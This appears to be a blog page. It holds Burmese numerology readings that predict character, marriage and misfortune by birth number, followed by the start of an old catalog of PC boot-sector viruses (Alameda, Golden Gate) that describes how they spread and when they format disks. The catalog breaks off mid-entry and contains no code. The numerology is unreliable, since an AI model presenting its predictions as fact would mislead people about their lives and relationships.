မင္းဟာ ေယာက်ာ္းေလးသာဆိုရင္ေတာ့ မိသားစုမွာ ခိုက္ရန္ျဖစ္တာေတြ..ျငင္းခုန္မႈေတြကို
သယ္ေဆာင္လာသူ ျဖစ္ေနပါလိမ့္မယ္..ဒါမွမဟုတ္ ေျပာင္းျပန္လည္း ျဖစ္ေနတက္ပါတယ္..
ဆိုလိုတာက.မိသားစုေကာင္းစားဖို့အတြက္ မင္းဘ၀ကိုေတာင္ စြန့္လြတ္ဖို့
၀န္မေလးတဲ့သူတစ္ဦးပါ...မင္းဟာ သိမ့္ေမြ႔တယ္..အျမင္က်ယ္တယ္..
သူတပါးရဲ့စိတ္ကို ခံစားနားလည္ေပးနိုင္တယ္..
လူေတြနဲ့ လိုက္ေလ်ာညီေထြေနတက္တဲ့သူ တစ္ဦးပါ...
မင္းရဲ့အေကာင္းဆံုး အေဖာ္မြန္ကေတာ့ 2, 5, 9 ..
တျခားသူေတြနဲ့ဆိုရင္ေတာ့..အဆင္ေျပဖို့ခဲ့ရင္းပါတယ္..!!!
***************
နံပါတ္ (၃)
နွလံုးသားမာေက်ာျပီ.. တကိုယ္ေကာင္းဆန္တက္တယ္.. ဒါေပမယ့္
ဘာသာတရားကို ကိုင္းရႈိုင္းတက္သူတစ္ဦးပါ..
တိုးတက္မႈကို ျမတ္နိုးတဲ့သူတစ္ဦးပါ.. မင္းဟာ မိသားစုျပႆနာေတြကို
ေလွ်ာ့က်ဖို့လိုလားေပမယ့္..ျပႆနာတိုင္းက မင္းဆီကေနပဲ ျမစ္ဖ်ားခံတက္တာမ်ားပါတယ္..
မင္းဟာ ႀသဇာအာဏာႀကီးမားျပီး.. နွစ္လိုဖြယ္မ်က္နွာထားကို ပိုင္ဆိုင္သူ တစ္ဦးပါ..
ဒါေႀကာင့္.. ဘယ္ေနရာကိုသြားသြား.. မင္းအလိုရွိတာေတြကို အဆင္သင့္ ရနိုင္ေနတာေပါ့..
မင္းဘ၀မွာ ေမြးဖြားလာကတည္းက တခုခုကို ရဖို့အတြက္
အျမဲတမ္း ျပင္းထန္စြာႀကိဳးစြာေနရတက္တယ္..
မႀကိဳးစားဘဲနဲ့ ရလာတာဆိုတာ အလြန္ပဲ ရွားပါးလွပါတယ္....
အရြယ္ေရာက္လာတဲ့အခါမွာ.. မင္းဟာ ကိုယ့္ထက္ငယ္ရြယ္သူေတြကို ဆိုဆံုးမတက္တယ္..
ဘာေႀကာင့္လဲဆိုေတာ့.. ႀကီးတဲ့သူကို ငယ္သူက ရိုေသမႈျပသရတာကို
မင္းဟာ နွစ္သက္လို့ပဲ.. အဲလိုလည္းမင္းဟာ စံျပေနေလ့ရွိပါတယ္..
ဒါေပမယ့္..ေယဘုယ်အားျဖင့္ေတာ့..
မင္းဟာ ေအးေဆးတည္ျငိမ္တဲ့သူတေယာက္မဟုတ္ပါဘူး..
မင္းနဲ့ဆက္ဆံဖို့ဆိုတာ..ခက္ခဲတဲ့အလုပ္တခုပါ..
မင္းဟာ စိတ္ဓါတ္မာတဲ့ ျပိဳင္ဘက္တေယာက္လိုပဲ...ဒါေပမယ့္လည္း..
တစံုတေယာက္ရဲ့အျပဳအမႈကို မင္းသေဘာက်သြားျပီဆိုလည္း..
မင္းတို့နွစ္ေယာက္ရဲ့ဆက္ဆံေရးဟာ အရမ္းကို ခိုင္မာေနတက္ပါတယ္...
မင္းဟာ အျမဲလိုလို..သူတပါးဆီက ေလးစားမႈကို ရရွိေနတက္သူ တစ္ဦးပါ..
မင္းဘ၀မွာ ရန္သူေတြ.ျပႆနာေတြ အမ်ားႀကီးရွိမယ္လို့ ထင္ရေပမယ့္..
အဲဒါေတြက ႀကာရွည္မခံပါဘူး..ဘာေႀကာင့္လည္းဆိုေတာ့..
မင္းက ပါရမီရွင္တေယာက္လိုပါပဲ.. သူတို့နဲ့ေျဖရွင္းရာမွာ ပိုင္နိုင္လြန္းပါတယ္..
မင္းဟာ ပိုက္ဆံကို အနည္းငယ္ပို မက္ေမာတဲ့အတြက္.. သူရဲ့ေစခိုင္းမႈေအာက္မွာ..
အဆံုးမရွိ ႀကိဳးစားျခင္းေတြ .ရုန္းကန္ျခင္းေတြနဲ့..မင္းဟာ နပန္းလံုးေနရတက္တယ္...
မင္းဟာ အမ်ိဳးသားတစ္ဦးဆိုရင္ေတာ့..အားလံုးဟာ ျပီျပည့္စံုေနပါျပီ..
မိသားစုကို ေစာင့္ေရွာက္တယ္..
သူငယ္ခ်င္းေတြကို ကူညီတယ္.. ဘ၀ကို ေပးကမ္းမႈေတြ..ႀကင္နာေတြနဲ့
အခ်ိန္ကုန္လြန္ေစတဲ့သူေပါ့ (ဒါေပမယ့္ ၂၁ ရက္ ေမြးသူမပါပါ).
ျပီးေတာ့ မင္းဟာ စံျပတေယာက္ျဖစ္ေနပါလိမ့္မယ္..
တကယ္လို့..မင္းဟာ အမ်ိဳးသမီးဆိုရင္လည္း.. အက်င့္စရိုက္ေကာင္းေတြ..
ယဥ္ေက်းသိမ္ေမြ႔႔မႈေတြ.. အလုပ္ႀကိဳစားမႈေတြနဲ့ ျပည့္ေနမွာပါ..
မင္းဟာ လြတ္လပ္မႈကို ျမတ္နိုးသူ.. တီထြင္သူ.. ရည္မွန္းခ်က္ႀကီးသူ..
အာရံုစူးစိုက္လုပ္တက္သူ
ျပီးေတာ့. ကမၻာကို အလွ..ေမွ်ာ္လင့္ခ်က္..ေပ်ာ္ရႊင္မႈေတြကို သယ္ေဆာင္လာသူ တစ္ဦးပါပဲ...
မင္းရဲ့ အေကာင္းဆံုး အေဖာ္မြန္ကေတာ့... 6, 9.
သင့္ေတာ္တဲ့အေဖာ္မြန္ကေတာ့..1, 3, 5!!!
****************
နံပါတ္ (၄)
မင္းလည္းပဲ ေခါင္းအလြန္မာတဲ့သူ တဦးပါပဲ..
အလုပ္ကို အရမ္းႀကိဳးစားတယ္..ဒါေပမယ့္ ဘ၀ရဲ့ အေရးႀကီးတဲ့ ကိစၥေတြမွာေတာ့
ကံမေကာင္းတက္ပါဘူး..ေအးေဆးေနတက္တယ္..ကူညီတက္သူျဖစ္ေပးမဲ့..
စကားေျပာတာက ပြင့္လင္းလြန္းပါတယ္..
အမ်ိဳးသားဆိုရင္ေတာ့ အဲဒီအတြက္နဲ့ပဲ.. တျခားလူေတြကို စိတ္အေႏွာက္ယွက္ပိုျဖစ္ေစျပီ..
မင္းကိုထားျပီ....အေ၀းကို ေျပးသြားတက္ႀကပါတယ္..
မင္းဟာ တခါတရံမွာေတာ့.. တျခားလူေတြနဲ့ သူတို့ရဲ့ ျပႆနာေတြကို
ေကာင္းေကာင္းႀကီး နားလည္ေနျပန္ေ၇ာ့.....
အခ်ိန္တိုင္းလိုလို မင္းဟာ အမ်ိဳးသမီးမိတ္ေဆြေတြနဲ့ အခ်ိန္ျဖဳန္းေနတက္ျပီ..
အမ်ိဳးသမီငယ္ေတြနဲ့ ေပ်ာ္ရႊင္ရတာကို နွစ္သက္သူ တစ္ဦးပါ..
မင္းသူငယ္ခ်င္းေတြဟာ မင္းရဲ့အခ်ိန္ေတြ..ေငြေတြကို သံုးျဖဳန္းျပီ..
အေ၀းကို ေျပးသြားတက္ႀကပါတယ္..
အဲဒီခါႀကရင္ေတာ့..မင္းဟာ ခိုးကို္ယ္ရာမဲ့ေနျပီဆိုတာ..အေသအခ်ာပါပဲ..အဲဒီအတြက္..
လံုး၀သတိျပဳပါ.. မင္းရဲ့စီတ္ထားေကာင္းကေတာ့..
မိသားစုနဲ့သူငယ္ခ်င္းေတြကို ကူညီတက္တာပါပဲ..
မင္းဟာ ငယ္ရႊယ္စဥ္မွာပဲ.. အခ်စ္ကို ေတြ့ရွိတက္ပါတယ္..
မင္းဘ၀မွာ တခါတရံ အဆင္မေျပမႈေတြနဲ့ ျပည့္နက္ေနတက္တယ္.. ဥပမာ..
မင္းဟာ ဘြဲ့တခုခုရထားေပမယ့္..အလုပ္လက္မဲ့ျဖစ္ေနတာမ်ိဳးေပါ့..
ဒါမွမဟုတ္.. ေအာက္ေျခအလုပ္ကို လုပ္ေနရတာမ်ိဳးေပါ့..
ဒါေပမယ့္..မင္းရဲ့မိသားစုကိုေတာ့..မင္းဟာ ေကာင္းေကာင္းေစာင့္ေရွာက္နိုင္ပါတယ္..
အဓီက သတိထားရမယ္လူေတြကေတာ့.. မင္းရဲ့ႀကင္နာတက္တဲ့ စိတ္ထားကို
အခြင့္ေကာင္းယူမယ့္သူေတြကိုပါပဲ..
ဒါေႀကာင့္..မင့္နဲ့ပတ္၀န္းက်င္ဆက္ဆံေရးကို အထူးသတိျပဳပါ..
အမ်ိဳးသမီးဆိုရင္ေတာ့.. မင္းဟာ ပညာရပ္ပိုင္းနဲ့ အႏုပညာပိုင္းမွာ ထြန္းေပါက္နိုင္ပါတယ္..
မင္းဟာ..စိတ္ရွည္တယ္.. ေခါင္းမာတယ္.. ေရွးရိုနည္းနည္းဆန္ျပီ..
အစီအစဥ္တက်လုပ္ကိုင္တက္သူတေယာက္ျဖစ္တယ္...
မင္းရဲ့အေကာင္းဆံုးအေဖာ္မြန္ေတြကေတာ့.. 1, 8.
သင့္ေတာ္တဲ့သူေတြကေတာ့...5, 6, 7!!!
*****************
နံပါတ္ (၅)
မင္းဟာ မင့္ပတ္၀န္းက်င္မွာ ေက်ာ္ႀကားတဲ့သူတစ္ဦးပါ..
မင့္ရဲ့နႈတ္ထြက္စကားေလးနဲ့တင္..မင္းအလိုရွိရာကို ရနိုင္ပါတယ္..
မင္းဟာ စီးပြားေရးအျမင္စူးရွသူတစ္ဦးလည္း ျဖစ္တယ္..
ဒါေပမယ့္.. မင္းဟာ စနစ္ရွိေတာ့မဟုတ္ပါဘူး..ေခါင္းထဲေပၚလာကို လုပ္တက္သူပါ.
တကယ္လို့ စီးပြားေရးလုပ္ငန္းတခုကို တည္ေထာင္မယ္ဆိုရင္လည္း..ေအာင္ျမင္မယ္သူပါ..
ျပီးေတာ့ ဟာသဥာဏ္ရႊင္တဲ့သူလည္းျဖစ္ေနျပန္ေရာ့..
မိသားစုနဲ့သူငယ္ခ်င္းေတြအတြက္ေတာ့.. မင္းဟာ တကယ့္ကယ္တင္ရွင္ႀကီးတစ္ဦးပါပဲ..
တကယ္လည္း.. မင္းဟာ လက္ေတြ့က်က် ကူညီတက္သူတစ္ဦးပါ...
မင္းဟာ နည္းနည္းေတာ့ ျမွာေပြတက္ေပမယ့္..
ဘ၀ကို တည္ေဆာက္မယ္ဆိုတဲ့အခါမွာေတာ့.. ကိုယ္က်ိဳးတြက္ ႀကည့္ျပီးမွ
ေရႊးခ်ယ္တက္သူပါ...မင္းဟာ လက္ထက္ျပီးတာေတာင္မွ ေက်ာ္ႀကားေနဦးမယ္သူပါ..
အဲဒီအတြက္.. သတိထားရမယ္အခ်က္ကေတာ့
မင့္ရဲ့ ေျခရႈပ္ခ်င္တဲ့ စိတ္ထားေလးပါပဲ.. အသိတရားနဲ့ ထိန္းခ်ဳပ္ရင္ေတာ့..
အရာအားလံုး အဆင္ေျပေနပါလိမ့္မယ္...
မင္းဟာ လူတိုင္းနဲ့ ပုလဲနံသင့္ပါတယ္..ဘာေႀကာင့္လည္းဆိုေတာ့..
နံပါတ္ ၅ ဟာ အလယ္ဂဏာန္း ျဖစ္ေနလို့ပဲ..ေျပာင္းလဲမႈနဲ့လြတ္လပ္မႈကို ျမတ္နိုးသူ..
ဆြဲေဆာင္မႈအျပည့္ရွိတဲ့ မ်က္နွာပိုင္ရွင္ေပါ့...
အေတြ့အႀကံဳကေန မင္းဘ၀ကို တည္ေဆာက္ရတဲ့သူျဖစ္ျပီ..အဲဒီအေတြ့အႀကံဳေတြကပဲ..
မင္းရဲ့အေကာင္းဆံုး ဆရာသမားေတြျဖစ္ေနေလရဲ့...
မင္းရဲ့အေကာင္းဆံုးအေဖာ္မြန္ကေတာ့.... 1, 2, 9.
သင့္ေတာ္တဲ့သူကေတာ့. 6, 8!!!
******************
နံပါတ္ (၆)
အိုး... မင္း ေပ်ာ္ရႊင္ဖို့အတြက္ပဲ ေမြးဖြားလာတာပါလား..
မင္းဟာ တျခားလူရဲ့ခံစားခ်က္ကို ဂရုမစိုက္တက္သူတစ္ဦးေပါ့..
ဆိုလိုတာက မင္းဘ၀မွာ မင္းဟာ အျမဲတမ္း ေပ်ာ္ရႊင္ေနခ်င္တဲ့သူပါ..
မင္းဟာ ပညာေရး..အလုပ္..စီမံခန့္ခြဲမႈမွာပဲျဖစ္ျဖစ္.. ေအာင္ျမင္မႈသူတစ္ဦးပါ..
မင္းဟာ ႀကင္နာတက္ပါတယ္..
(ဒါေပမယ့္ မင့္စိတ္ထဲမွာ ေကာင္းတယ္လို့ထင္တဲ့ လူေတြအေပၚမွာသာ).....
ရုပ္ရည္အရမ္းေခ်ာ္ေမာေနတက္ျပီ.. ဘ၀ဟာလည္း. ကံေကာင္းျခင္းေတြ စုေနတက္ပါတယ္..
ကံႀကမၼာေကာင္းေတြဟာ မင္းနဲ့အတူလာတယ္လို့ ေျပာလို့ရနိုင္ပါတယ္..
မင္းရဲ့စိတ္ထားနဲ့ခႏၶာဟာ အခ်စ္ကိစၥေတြမွာ လိႈင္လႈိင္လွဲလွဲရွိလွပါတယ္..
တျခားနံပါတ္ေတြရဲ့ ခ်စ္ျခင္းေမတၱာကို ခံရတက္ပါတယ္...ဒါေပမယ့္..
မင္းဟာ အမ်ိဳးသားဆိုရင္ေတာ့.. လက္ထက္တဲ့အခ်ိန္အထိ မိန္းကေလးငယ္မ်ားနဲ့
ရင္းရင္းနွီးနွီးေနရတာကို နွစ္သက္တဲ့သူတဦးပါ..
အမ်ိဳးသမီးသာဆိုရင္ေတာ့.. ေစ့စပ္ေႀကာင္းလမ္းမႈ..ဒါမွမဟုတ္ လက္ထက္တာကို
ေစာေစာစီးစီး ရင္ဆိုင္ရတက္ပါတယ္..
ႀကင္နာတက္သူေတြပဲ မင့္ဘ၀ထဲကို ၀င္လာပါလိမ့္မယ္..
ေယဘုယ်အားျဖင့္ေတာ့.. မင္းဟာ အိမ္ရဲ့ဆည္းလွည္းေလးပါပဲ... စာနာတက္သူ...
နွစ္သိမ့္မႈေပးနိုင္သူ.မွ်တသူ..အိမ္ေထာင္မႈနိုင္နင္းသူ..ဆံုးျဖတ္ခ်က္ေကာင္းမြန္သူတစ္ဦးပါပဲ...
ကုန္ကုန္ေျပာရရင္.. မင့္ရဲ့အႀကင္နာေတြနဲ့..ဒီကမၻာေလာကႀကီးရဲ့
ဒဏ္ရာ ဒဏ္ခ်က္ေတြကိုကုစားေပးနိုင္သူတေယာက္ပါပဲ...
မင္းရဲ့အေကာင္းဆံုးအေဖာ္မြန္ေတြကေတာ့.. 1, 6, and 9.
သင့္ေလ်ာ္တဲ့သူေတြကေတာ့.. 4, 5!!!
*******************
နံပါတ္ (၇)
မင္းဟာ ဆြဲေဆာင္မႈရွိသူ.. ယထာဘူတ ၀ါဒီတေယာက္ပါ..
မိမိကိုယ့္ကို ယံုႀကည္တက္တယ္..ေပ်ာ္ေပ်ာ္ရႊင္ရႊင္ေနတက္ျပီ..ပညာေရးမွာ
ထူးခၽြန္သူ တစ္ဦးပါ..ဂီတ.အနုပညာ..သီခ်င္းဆို..သရုပ္ေဆာင္နယ္ပယ္ေတြမွာလည္း..
ထူးခၽြန္နိုင္သူပါ..မင္းရဲ့ျပႆနာကေတာ့..မင့္ရဲ့ေဒါသစိတ္ပါပဲ..
အမ်ိဳးသမီးဆိုရင္ေတာ့. အထက္ကအခ်က္ေတြနဲ့ မင္းဟာ ေအာင္ျမင္နိုင္ပါတယ္..
မင္းဟာ..မင့္မိဘအတြက္ ဘာမဆို စြန့္လႊ႔တ္နိုင္သူလည္းျဖစ္တယ္..
(ဆိုလိုတာက မိသားစုကို အရမ္းတန္းဖိုးထားတက္တာပါ)
အရြယ္ရလာတာနဲ့အမွ် မင္းရဲ့အဆင့္အတန္းကလည္း တျဖည္းျဖည္း ျမင့္တက္ေနမွာပါ..
အမ်ိဳးသားတစ္ဦးသားဆိုရင္ေတာ့ အမ်ိဳးသမီးထုႀကားမွာ ေရပန္းစားမယ့္သူပါ..
ဘက္စံုထူးခၽြန္သူတစ္ဦးလည္းျဖစ္ေနပါတယ္..
နံပါတ္ (၇) သမားအမ်ားစုဟာ သူတို့ရဲ့အိမ္ေထာင္သည္ဘ၀မွာ
အဆင္မေျပႀကတာမ်ားပါတယ္..အနည္းစုေလာက္ပဲ ေပ်ာ္ရႊင္ခ်မ္းေျမ႔တဲ့ဘ၀ကို
တည္ေဆာက္နိုင္ႀကတာပါ.... မင္းရဲ့ဘ၀မွာ အရာအားလံုးရွိေနေပမယ့္..
အလိုမက်မႈေတြ..စိုးရိမ္ေႀကာင့္က်မႈေတြ ကလည္း ရွိေနတက္ျပန္ေရာ့..
ဒါကလည္း..ဘုရားသခင္က မင္းကို အရာအားလံုးမွ်တေအာင္
ေပးထားတဲ့သေဘာလို့ထင္ပါတယ္.. မင္းလို ထူးခြ်န္တဲ့သူ ၁၀၀ေလာက္ကို
နႈိုင္းယွဥ္ႀကည့္မယ္ဆိုရင္ မင္းတေယာက္ေလာက္ပဲ အိမ္ေထာင္ေရး
မသာယာတာမ်ိဳးေတြ့ရတက္ပါတယ္.. ဒါေႀကာင့္.. ႀကင္ေဖာ္ကို ေစာင့္စားေနတာထက္..
ကိုယ္နဲ့ လိုက္ေလ်ာ္ညီေထြမယ့္သူကို ေစာေစာစီးစီး ရွာထားသင့္ပါတယ္...
အဲလိုမွ မလုပ္ခ်င္ဘူးဆိုရင္ေတာ့..မင္းဟာ ဘ၀ကို
အထီးက်န္စြာ ျဖတ္သန္းသြားရမွာ အေသအခ်ာပါပဲ..
ဒါေႀကာင့္..ဒီကိစၥနဲ့ပတ္သက္ျပီး ေသခ်ာဂရုစိုက္အေလးထားသင့္ပါတယ္..
မင္းဟာ အံဖြယ္ေကာင္းေသာ.ေဖာ္ေရႊေသာ.ယဥ္ေက်းသိမ့္ေမြ႔ေသာ
ေပ်ာ္ေပ်ာ္ေနတက္တဲ့ လူတေယာက္ပါ..
မင္းဟာဒီကမၻာေလာကႀကီးကို ျဖည့္ဆည္းေပးဖို့ ေမြးဖြားလာသူတစ္ဦးပါ..
မင္းရဲ့အေကာင္းဆံုးအေဖာ္မြန္ေတြကေတာ့.. 2.
သင့္ေတာ္တဲ့အေဖာ္မြန္ကေတာ့.. 1,4 !!!
**********************
နံပါတ္ (၈)
မင္းရဲ့ ဘ၀ဟာ ႀကမ္းတမ္းလြန္းပါတယ္. ဘာေႀကာင့္ဆိုတာ.
ဘယ္သူမွ မင္းကို နားလည္နိုင္မွာ မဟုတ္ပါဘူး..
သူတပါးကို အျပစ္ေျပာရာမွာ မင္းဟာ တဖက္ကမ္းခတ္ ကၽြမ္းက်င္လွပါတယ္..
မင္းရဲ့ ငယ္စဥ္ဘ၀ဟာ ဆင္းရဲ့နံုခ်ာနိုင္ပါတယ္..
အေျခအေနက မေပးဘူးဆိုရင္ေတာ့.. မင့္ရဲ့မိဘေတြကိုေတာင္ ေစာစီးစြာ
လက္လႊတ္ရနိုင္ပါတယ္.. ဒီလိုမ်ိဳးအျဖစ္အပ်က္ေတြကမင့္ဘ၀ထဲမွာ
မႀကာခဏျဖစ္ေနမယ္အရာေတြပါ..
ဒီျပႆနာေတြကပဲ မင္းရဲ့ပညာေရးကို တားဆီးေနပါလိမ့္မယ္..
ဒါေပမယ့္ မင္းဟာ ဘ၀ကို တျခားနည္းနဲ့ ေလ့လာသင္ယူနိုင္ပါလိမ့္မယ္.
မင္းဟာ တရားမွ်တမႈအတြက္ တိုက္ပြဲ၀င္ရဲတဲ့သူတစ္ဦးပါ..
ဒါေပမယ့္ အဲဒီတိုက္ပြဲမွာပဲ က်ဆံုးနိုင္သူလည္း ျဖစ္ေနျပန္ေ၇ာ့.
ပံုမွန္အားျဖင့္..မိတ္ေဆြေတြနဲ့ဆက္ဆံရာမွာ မင္းဟာ တည္ႀကည္ေလးနက္စြာ ေနတက္ျပီ..
ဘ၀ကိုလည္း..အထီးက်န္စြာျဖတ္သန္းေနရမယ့္သူပါ..
ျပီးေတာ့ တပါးသူကို ကူညီဖို့အသင့္ရွိေနသူ တစ္ဦးပါ..
မင္း အိမ္ေထာင္က်တဲ့အခါမွာေတာ့
(အဲဒါကလည္း.. အမ်ားအားျဖင့္ အလယ္အလတ္အရြယ္မွာပဲ ျဖစ္ပြားတက္ပါတယ္)
မင့္ရဲ့ကံႀကမၼာဆိုးအနည္းငယ္ဟာ လြင့္ေပ်ာက္သြားသလို ခံစားရပါလိမ့္မယ္..
ျပီးေတာ့ မင္းဟာ လံုျခံဳခ်မ္းေျမ့မႈကို ရရွိပါလိမ့္မယ္..
မင္းဟာ မေမွ်ာ္လင့္တဲ့အႏၱရာယ္ေတြကိုလည္း..ယွဥ္ဆိုင္ေတြ႔ရနိုင္ပါတယ္..
ဥပမာ..( အမႈအခင္းမ်ား..အဆိပ္ရွိသတၱ၀ါမ်ား..မေတာ္တဆထိခို္က္မႈမ်ားနဲံ ႀကံုေတြနိုင္ပါတယ္)
သိုေပသိ.. မင္းဟာ စည္းကမ္းလိုက္နာတဲ့သူ..လံု့လ၀ီရိယရွိသူ.ရဲရင့္သူ..
ခြန္းအားဗလနဲ့ျပည့္စံုသူ. တစ္ေယာက္ပါ..
အဲဒါေတြကပဲ မင္းကို ေအာင္ျမင္မႈဆီကို ေခၚေဆာင္သြားမွာပါ..
မင္းဟာ မိသားစုရဲ့ အဓီက အစိတ္အပိုင္းတခုပါ..
အားကိုယ္ရဆံုးသူတစ္ဦးလည္းျဖစ္ျပီး.. ဖိုက္တာတစ္ဦးလည္းျဖစ္ေနျပန္ေရာ့...
မင္းရဲ့ အေကာင္းဆံုးအေဖာ္မြန္ကေတာ့.. 1, 4, and 8.
သင့္ေတာ္တဲ့အေဖာ္မြန္ကေတာ့ 5!!!
********************
နံပါတ္ (၉)
မင္းကေတာ့ ဒီကမၻာေလာကႀကီးမွာ သဟဖာတမျဖစ္ဆံုး လူသားတစ္ဦးေပါ့..
မင္းဟာ ရုပ္ပိုင္း..စိတ္ပိုင္း အရမ္းကို ႀကံ႔ခိုင္လြန္းသူတစ္ဦးပါ..
ရည္မွန္းခ်က္ႀကီးမားသူတဦးလည္းျဖစ္ျပန္ေရာ့..
မင္းဟာ အလုပ္ကို အရမ္းႀကိဳးစားလုပ္ကိုင္ရမွာျဖစ္ျပီ..
ေအာင္ျမင္မႈကိုလည္း ခက္ခဲစြာ ရယူရမယ့္သူတစ္ဦးပါ..
သာမန္အားျဖင့္ေတာ့ ငယ္ရြယ္စဥ္မွာ မင္းဟာ မိသားစုျပႆနာေတြနဲ့
လံုးပန္းေနရတက္ပါတယ္..ျပီးေတာ့ ဘ၀ဟာလည္း.
ရုန္းရင္းဆန္ခတ္မႈေတြနဲ့ ျပည့္နွက္ေနပါတယ္.. ဒါေပမယ့္
မင္းအလိုရွိတာကို ရရွိတဲ့အခ်ိန္ကစျပီးေတာ့ မင္းရဲ့ဘ၀ လံုး၀ေျပာင္းလဲသြားပါလိမ့္မယ္..
မင္းဟာ ပတ္၀န္းက်င္မွာ အေလးစားခံရဆံုးပုဂၢိဳလ္တစ္ဦးျဖစ္ေနပါလိမ့္မယ္..
စိန္ေခၚမႈေတြကို နွစ္သက္ျပီ.. ျပိဳင္ဘက္ေတြကို အလွဲထိုးနိုင္တဲ့သူ တစ္ဦးေပါ့..
ငယ္ရြယ္စဥ္မွာေတာ့ မင္းဟာ အရမ္းကို ေပေတမဲ့ ကေလးတေယာက္ပါ..
မိဘက မႀကာခဏရိုက္နက္ဆံုးမရသူ.. ရန္ခဏခဏ ျဖစ္တက္သူတစ္ဦးေပါ့..
မင့္ဘ၀ဟာ ဒဏ္ရာအနာတ၇ေတြနဲ့ ျပည့္နက္ေနသလိုပါပဲ..
ဒါေပမယ့္..အရြယ္ေရာက္လာတဲ့အခါမွာေတာ့..
မင္းဟာ ေအးေဆးတည္ျငိမ္လာျပီ.. ေယာက်ာ္းပီသစြာ ေနထိုင္ျပန္ေရာ့..
ခ်စ္ျခင္းေမတၱာကေတာ့ မင္းအတြက္ လြယ္ကူတဲ့ကိစၥေတာ့မဟုတ္ပါဘူး..
မင္းဟာ ေဆာက္လုပ္ေရးအလုပ္..ဘဏ္အလုပ္ေတြနဲ့ သင့္ေလွ်ာ္ပါတယ္..
ဘာေႀကာင့္လဲဆိုေတာ့ လူေတြကို မင့္ကို ယံုႀကည့္ႀကလို့ပါပဲ..
မင့္ရဲ့မိသားစုဘ၀ကေတာ့ အရမ္းကို ေကာင္းမြန္လွပါတယ္.
ဒါေပမယ့္ မင့္ကေလးေတြအတြက္ေတာ့ စိုးရိမ္ရပါလိမ့္မယ္..
မင္းဟာ လူလူခ်င္းစာနာတက္သူ..စိတ္ရွည္သူ..ပညာဥာဏ္ႀကီးမားသူ..
နားလည္းခြင့္လြတ္ေပးနိုင္သူတစ္ဦးပါ...
မင္းဟာ ရည္မွန္းခ်က္ေတြကို ရယူဖို့.. အဂတိတရားမထားပဲ လူေတြအေပၚ
အလုပ္အေကၽြးျပဳဖို့ ေမြးဖြားလာသူတစ္ဦးပါ...
မင္းဟာ အံ့ဖြယ္စိတ္ကူးစိတ္သန္းေတြမွာ လူတိုင္းအတြက္ စံျပတေယာက္ပါ..
မင့္ရဲ့အေကာင္းဆံုး အေဖာ္မြန္ကေတာ့.. 3, 5, 6, and 9.
သင့္ေတာ္တဲ့ အေဖာ္မြန္ကေတာ့ 2!!!ေတြပါ
Monday, June 25
Kinds of computer virus
It is difficult to name, identify and classify PC viruses.
Everyone who first discovers a virus will name it and describe
what they think of it. In most cases, the virus is not new and
has been named and described dozens of times before. None of the
names and few of the descriptions will match. While I'm writing
this, for example, I feel certain that someone, somewhere has
just been infected by the Jerusalem virus and they are telling
their co-workers and friends about it as if it were newborn - and
for them perhaps it is. It will be impossible to verify the
strain and variety of the infection, however, unless we can get a
living sample of the virus to analyze and compare with other
strains of this same virus. So problem number one is filtering
the reports of infection and collecting samples that can be
placed under the knife.
Problem number two is - where do you draw the line between
an original virus and a true variation of the virus? The
original Brain virus, for example, could only infect a floppy
diskette. Do the varieties of the Brain that can infect hard
disks (but in every other respect are identical) deserve to be
called new viruses, or are they still the Brain? What about
further modifications that destroy data? Is this now a new
virus? What if someone extracts a segment of the Brain code and
uses it as a basis for a new virus? What if nothing changes but
the imbedded text data, so that the virus is in every way
functionally identical, but the volume label changes to "SMURF"
instead of BRAIN. All of these modifications to the Brain have
been discovered and logged. How do we deal with them?
I choose to deal with these modifications in the simplest
way I know. If the virus differs in any way from the original
(assuming that the "original" can in fact be identified), then I
log it as a new strain. This relieves me from having to make
decisions. Those of you who see the world differently can merely
take this listing and lump together all of the different strains
that you like. That way we'll all be happy.
This will be, by the way, my last virus document. I have
worked double time for the past eighteen months helping John
McAfee and his Homebase folks and, while I have thouroughly
enjoyed myself, I have finally burned out. It has been great fun
and I've learned a lot, and hopefully some of my works, like the
product review with Sankary and Marsh, will end up being somehow
useful to the world. But now I have the irresistible urge to go
fishing, and, perhaps afterwards, to contemplate my navel for a
few years. In-between times I intend to write a book on the
craziness in this industry and about the unique personalities
I've had the pleasure to work with in the Virus Marine Corps.
It's been quite an adventure. Thank you all.
Jim Goodwin From the Homebase BBS 408 988 4004
THE VIRUSES
I have arranged these viruses so that similar varieties are
described in the sequence in which they appeared within the virus
sub-group (to the best of my knowledge). Not everyone agrees
with my groupings. Many people believe, for instance, that the
Golden Gate-C (Mazatlan Virus) is a distinctly original virus and
is not a variation of the Alameda. I think differently and have
endeavored to show how the Golden Gate evolved from the Alameda,
through each precursor virus. I cannot prove, of course, that
the sequence of appearances is the correct sequence, and in many
cases I have had to guess. If anyone wishes to re-order
these virus, I will not be offended.
I have not included any of the specific application trojans
in this list. There has been a lot of discussion about the Lotus
123 and DBASE "viruses", for example. These are not replicating
programs and I do not classify them as viruses. I had originally
intended a separate list to include these non-replicating trojans
but Time caught up with me.
1. ALAMEDA VIRUS
(Also called: Yale; Merritt; Pecking; Seoul)
This is a boot sector infector. First discovered at Merritt
college in California (1987). Original version caused no
intentional damage. Replicates at boot time
real boot sector at track 39, sector 8, head 0. Contains a
count of the number of times it has infected other
diskettes, although it is referenced for write only and is
not used as part of an activation algorithm. The virus
remains resident at all times after it is booted, even if no
floppy is booted and BASIC is loaded. Contains a rare POP
CS instruction that makes it incapable of infecting 286
systems.
2. ALAMEDA-B
(Also called Sacramento Virus)
This is the original Alameda Virus that has the POP CS
removed. Relocation is accomplished through a long jump
instruction. All other characteristics are identical. This
version runs OK on a 286.
3. ALAMEDA-C
This is the Alameda-B virus that has been modified to
disable the boot function after 100 infections. The
counter in the original Alameda virus has been re-activated
and is interrogated at each bootup. When it reaches 100 the
virus disconnects from the original boot sector (control is
no longer passed) and the diskette will no longer boot. At
infection time, the counter is zeroed on the host diskette.
4. SF VIRUS
This is the Alameda-C that has been modified to format the
boot diskette when the counter runs out.
5. GOLDEN GATE VIRUS
(Also called The 500 Virus)
This is the SF Virus that has been modified to format the C
drive when the counter runs out. The activation occurs
after 500 infections, instead of 100 infections. Note that
in all three of these strains, the counter is zeroed on the
host diskette at infection time. Thus, the activation
period on this virus will on the average stretch into many
years. No corruption will occur until 500 new diskettes
have been infected from within a given machine. Since the
infection can only occur when the system is booted with a
new diskette, infection is not frequent with this virus. I
expect that the overwhelming majority of infections will
never activate. The IBM PC will have long since been
supplanted by another architecture in most environments.
6. GOLDEN GATE-B
This virus is the Golden Gate virus that has had the
activation delay reset to 30 infections. This virus should
activate within a couple of years in most environments.
7. GOLDEN GATE-C
(Also called the Mazatlan Virus)
